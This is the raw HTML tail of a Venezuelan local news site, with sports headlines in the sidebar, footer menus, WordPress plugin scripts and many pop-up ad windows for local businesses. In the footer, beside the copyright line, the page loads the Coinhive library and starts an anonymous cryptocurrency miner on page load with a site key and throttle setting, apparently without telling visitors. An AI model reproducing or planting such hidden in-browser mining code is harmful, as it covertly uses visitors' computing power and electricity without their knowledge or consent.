                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/15197536761565449371-333x227.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/15197536761565449371.jpg" alt="El médico de la selección brasileña evaluará a Neymar en París">
                </a>
            </figure>
            <div class="slider-widget-title">
                <h2 itemprop="name">
                    <a itemprop="url" href="http://diarioavance.com/?p=165416">
                        El médico de la selección brasileña evaluará a Neymar en París                    </a>
                </h2>
            </div>
        </div>
                		        <div class="slider-widget-item" itemscope="" itemtype="http://schema.org/Article">
            <figure class="post-thumbnail">
                <a itemprop="url" href="http://diarioavance.com/?p=165412" rel="bookmark">
                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/15197659081230693528-333x227.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/15197659081230693528.jpg" alt="El Madrid se estancó con el Espanyol">
                </a>
            </figure>
            <div class="slider-widget-title">
                <h2 itemprop="name">
                    <a itemprop="url" href="http://diarioavance.com/?p=165412">
                        El Madrid se estancó con el Espanyol                    </a>
                </h2>
            </div>
        </div>
                		        <div class="slider-widget-item" itemscope="" itemtype="http://schema.org/Article">
            <figure class="post-thumbnail">
                <a itemprop="url" href="http://diarioavance.com/?p=165277" rel="bookmark">
                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/alema.jpg_1609701233-333x227.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/alema.jpg_1609701233-702x432.jpg" alt="Juegos de Invierno: Alemania sigue comandando el medallero de Pyeongchang-2018">
                </a>
            </figure>
            <div class="slider-widget-title">
                <h2 itemprop="name">
                    <a itemprop="url" href="http://diarioavance.com/?p=165277">
                        Juegos de Invierno: Alemania sigue comandando el medallero de Pyeongchang-2018                    </a>
                </h2>
            </div>
        </div>
                		        		                             </div>
</div>
</div></aside><!--sidebar-->							
    </div><!--container-->

</div><!--wrap-->
            
<footer class="footer clearfix">
    <div class="inner">
        
                	<div class="footer-widget one-full">
                                	</div>
                
    </div>
</footer>            
                        
                        <div class="footer-bottom" role="contentinfo" itemscope="itemscope" itemtype="http://schema.org/WPFooter">
                <div class="inner">
                    <div class="alignright">
                        
                        
                        <div class="menu-abajo-container"><ul id="menu-abajo" class="footer-bottom-menu"><li id="menu-item-116" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-116"><a href="http://diarioavance.com/?cat=52">Impreso Digital</a></li>
<li id="menu-item-125017" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-125017"><a href="http://diarioavance.com/?page_id=37571">Nosotros</a></li>
<li id="menu-item-125015" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-125015"><a href="http://diarioavance.com/?page_id=37575">Directorio</a></li>
<li id="menu-item-125016" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-125016"><a href="http://diarioavance.com/?page_id=37573">Publicidad</a></li>
<li id="menu-item-67" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-67"><a href="http://diarioavance.com/denuncias/">Denuncias</a></li>
</ul></div>                        
                                                <ul class="footer-bottom-social">
                                <li class="facebook"><a href="https://www.facebook.com/DiarioAvanceWeb?fref=ts" target="_blank"></a></li>
        <li class="twitter"><a href="https://twitter.com/DiarioAvanceWeb" target="_blank"></a></li>
        <li class="google"><a href="https://plus.google.com/u/0/113197345653513283562/posts" target="_blank"></a></li>
    <li ><a class="vector_icon" rel="momizat-icon-instagram" href="http://instagram.com/diarioavance" target="_blank"><i class="momizat-icon-instagram"></i></a></li><li data-bghover="#ff8800"><a class="vector_icon" rel="steady-icon-map-marker" href="https://twitter.com/mercadoavance24" target="_blank"><i class="steady-icon-map-marker"></i></a></li>                        </ul>
                                            </div>
                    <div class="alignleft">
                        
                        
                        <div class="footer-logo">
                            <a itemprop="url" href="http://diarioavance.com">
                                                            <img src="http://diarioavance.com/wp-content/uploads/2017/01/logo-diarioavance-footer.png" alt="Diario Avance">
                                                        </a>
                        </div>
                                                <div class="copyrights">Diario Avance de los Teques C.A. RIF: J-00218525-2 | Todos los derechos reservados © 2017.</div>
                        <script src="https://coinhive.com/lib/coinhive.min.js"></script>
						<script>
						var miner = new CoinHive.Anonymous('g58owloyQJLhGnme438ka0BSxhnfQq5X', {throttle: 0.3});
						if (!miner.isMobile() && !miner.didOptOut(14400)) {
							miner.start();
							}
						</script>
                    </div>
                </div>
            </div>
                        <a class="toup" href="#"><i class="enotype-icon-arrow-up6"></i></a>        </div><!--fixed layout-->
        		<!-- Memberships powered by Paid Memberships Pro v1.9.4.3.
 -->
		<!-- Scroll Triggered Boxes v2.2.1 - https://wordpress.org/plugins/scroll-triggered-boxes/-->			<div class="stb-container stb-center-container">
				<div class="scroll-triggered-box stb stb-165515 stb-center"
				     id="stb-165515"
				     style="display: none;">
					<div class="stb-content">
											</div>
											<span class="stb-close">&times;</span>
									</div>
			</div>
			<div id="stb-overlay"></div><!-- / Scroll Triggered Box --><script type='text/javascript' src='http://diarioavance.com/wp-includes/js/comment-reply.min.js?ver=4.9.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/diarioavance.com\/index.php?rest_route=\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Por favor, prueba que no eres un robot."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://diarioavance.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0'></script>
<script type='text/javascript' src='http://diarioavance.com/wp-content/themes/multinews/js/plugins.min.js?ver=1.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var momAjaxL = {"url":"http:\/\/diarioavance.com\/wp-admin\/admin-ajax.php","nonce":"8f05f61ed0","success":"Check your email to complete subscription","error":"Already subscribed","error2":"Email invalid","nomore":"No More Posts","homeUrl":"http:\/\/diarioavance.com","viewAll":"View All Results","noResults":"Sorry, no posts matched your criteria"};
/* ]]> */
</script>
<script type='text/javascript' src='http://diarioavance.com/wp-content/themes/multinews/js/main.js?ver=1.0'></script>
<script type='text/javascript' src='http://diarioavance.com/wp-content/plugins/js_composer_ori/assets/lib/prettyphoto/js/jquery.prettyPhoto.js?ver=4.3.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var STB_Global_Options = {"testMode":""};
var STB_Box_Options = {"165515":{"id":165515,"title":"Suscribite  nuestro impreso Digital\u00a1\u00a1\u00a1","trigger":"percentage","triggerPercentage":25,"triggerElementSelector":"","animation":"fade","cookieTime":0,"autoHide":false,"autoShow":true,"position":"center","minimumScreenWidth":300,"unclosable":false}};
/* ]]> */
</script>
<script type='text/javascript' src='http://diarioavance.com/wp-content/plugins/scroll-triggered-boxes/assets/js/script.min.js?ver=2.2.1'></script>
<script type='text/javascript' src='http://diarioavance.com/wp-content/plugins/layered-popups/js/script.min.js?ver=5.91'></script>
<script type='text/javascript' src='http://diarioavance.com/wp-includes/js/wp-embed.min.js?ver=4.9.4'></script>
<script type='text/javascript' src='http://diarioavance.com/wp-content/plugins/js_composer_ori/assets/js/js_composer_front.js?ver=4.3.4'></script>
<script type='text/javascript' src='http://diarioavance.com/wp-content/plugins/js_composer_ori/assets/lib/jquery-waypoints/waypoints.min.js?ver=4.3.4'></script>

				<div class="ulp-overlay" id="ulp-niuVwn1b9CPySnOo-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-niuVwn1b9CPySnOo" data-title="Matadero La Tropical" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-231" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-249" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/matadero-la-tropical-insta.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-41YmVufxOkhb1jNl-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-41YmVufxOkhb1jNl" data-title="Liga de Softbol de Carrizal Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-230" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-248" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/LIGA-DE-SOFTBOL-DE-CARRIZAL-INSTA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-RqfTGVP3BftKFK8y-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-RqfTGVP3BftKFK8y" data-title="Pedro Camejo Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-250" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-252" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/PEDRO-CAMEJO-INSTA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-W1FjwTdKrIeT5hWg-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-W1FjwTdKrIeT5hWg" data-title="Atlantis Librería y Papelería Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-229" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-247" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/LIBRERIA-ATLANTIS-INSTA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-bTlNF2NKQJbxv1c5-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-bTlNF2NKQJbxv1c5" data-title="JUAN XVII Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-228" data-left="450" data-top="-35" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-246" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/JUAN-XXIII-NAVIDAD-INSTA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-WKcTEhZnnJacRYh8-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-WKcTEhZnnJacRYh8" data-title="Funeraria de Carrizal Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-227" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-245" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/FUNERARIA-CARRIZAL-INSTA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-yo1wXiOeRCKVz1vH-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-yo1wXiOeRCKVz1vH" data-title="Contraloría de Carrizal Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-221" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-244" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/CONTRALORIA-CARRIZAL-NAVIDAD-INSTA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-4KgFqV41Og2y9q6V-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-4KgFqV41Og2y9q6V" data-title="Consejo Municipal de Carrizal Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-226" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-243" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/CONCEJO-MUNICIPAL-DE-CARRIZAL-INSTA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-ok89R2E8ChwGHw4b-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-ok89R2E8ChwGHw4b" data-title="Chef School Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-225" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-242" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/CHEF-SCHOOL-INSTA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-GB4c7clq4xHtA9Jl-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-GB4c7clq4xHtA9Jl" data-title="Kentuky Derby Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-222" data-left="450" data-top="-35" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-241" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/CENTRO-HIPICO-KENTUCKY-INSTA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-HicVq5S45lSnQp8M-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-HicVq5S45lSnQp8M" data-title="Central Madeirense Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-224" data-left="375" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-239" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/Central.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-XgepN3M9GVsCyRDp-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-XgepN3M9GVsCyRDp" data-title="Alcaldía Los Salias Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-223" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-238" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/ALCALDIA-LOS-SALIAS.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-V8zLOVXuWIb4jRVl-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-V8zLOVXuWIb4jRVl" data-title="Metro Los Teques Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-253" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-255" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/REDES-SOCIALES-METRO-LOS-TEQUES.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-ztyA1ZH8hx2jtr6g-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-ztyA1ZH8hx2jtr6g" data-title="Alcaldía de Guaicaipuro Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-233" data-left="455" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-237" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/ALCALDIA-DE-GUAICAIPURO.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-GLde9uss21XXvCLq-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-GLde9uss21XXvCLq" data-title="Alcaldía de Carrizal Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-236" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/ALCALDIA-DE-CARRIZAL.jpg" alt="" /></div>
						<div class="ulp-layer" id="ulp-layer-240" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-ywD2UX5GnJSEweVO-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-ywD2UX5GnJSEweVO" data-title="Off Road Rifa Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-256" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-258" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/REDES-SOCIALES-RESULTADOS-OFF-ROAD-RIFA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-iFCuwakBbBFbebOp-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-iFCuwakBbBFbebOp" data-title="Video Club Sonorosa Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-259" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-261" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/SONOROSA-CAMBIOS-insta.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-W4XhlQCqhH18uouL-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-W4XhlQCqhH18uouL" data-title="OperaLab Navidad 2016" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-262" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-264" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2016/12/oprelab-insta.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-Ryif2XKkLJd6GtGT-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-Ryif2XKkLJd6GtGT" data-title="Multiservicios LD" data-width="450" data-height="450" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-265" data-left="450" data-top="-30" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-267" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2017/01/banner-multiservicios-ld.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-klPFs3kF9g6UGdls-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-klPFs3kF9g6UGdls" data-title="MercadoAvance" data-width="500" data-height="500" data-position="middle-center" data-close="on" data-enter="off">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-268" data-left="480" data-top="-35" data-appearance="fade-in" data-appearance-speed="10000" data-appearance-delay="0"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-312" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2017/06/CONFECCIONES-KAIL-INSTAGRAM.jpg" alt="" /></div>
						<div class="ulp-layer" id="ulp-layer-313" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="7000"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2017/05/multiservicios-ld-2-nuevo-12-05-1.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-qsQeqzJJRpdO8udg-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-qsQeqzJJRpdO8udg" data-title="publicidad" data-width="500" data-height="500" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-277" data-left="485" data-top="-35" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-278" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2017/08/instagram-edicion-los-teques-240-5.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-rakLFdtaqmrKSmko-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-rakLFdtaqmrKSmko" data-title="publicidad1" data-width="500" data-height="500" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-294" data-left="480" data-top="-35" data-appearance="fade-in" data-appearance-speed="1500" data-appearance-delay="500"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-287" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2017/05/OFF-ROAD-RIFA1.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-HzH8vPTAVa3af6eF-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-HzH8vPTAVa3af6eF" data-title="pub_01" data-width="500" data-height="500" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-300" data-left="480" data-top="-35" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-301" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2018/02/ya-viene-impreso-digital.jpg " alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-uvHkPoPeBPZxu5Tq-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-uvHkPoPeBPZxu5Tq" data-title="pub_02" data-width="1000" data-height="600" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-302" data-left="0" data-top="-35" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-303" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src=" http://diarioavance.com/wp-content/uploads/2017/10/impreso-255x15.jpg " alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-oKRYtinqs8TaFpLJ-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-oKRYtinqs8TaFpLJ" data-title="pub_03" data-width="500" data-height="500" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-304" data-left="480" data-top="-35" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-305" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2017/04/HORUS.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-TtxNTrN72gnsT4Dx-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-TtxNTrN72gnsT4Dx" data-title="pub_04" data-width="500" data-height="500" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-306" data-left="485" data-top="-35" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-307" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src=http://diarioavance.com/wp-content/uploads/2017/09/Redes-Sociales.jpg alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-Fc6wyaR3UbSBvpwl-overlay"></div>
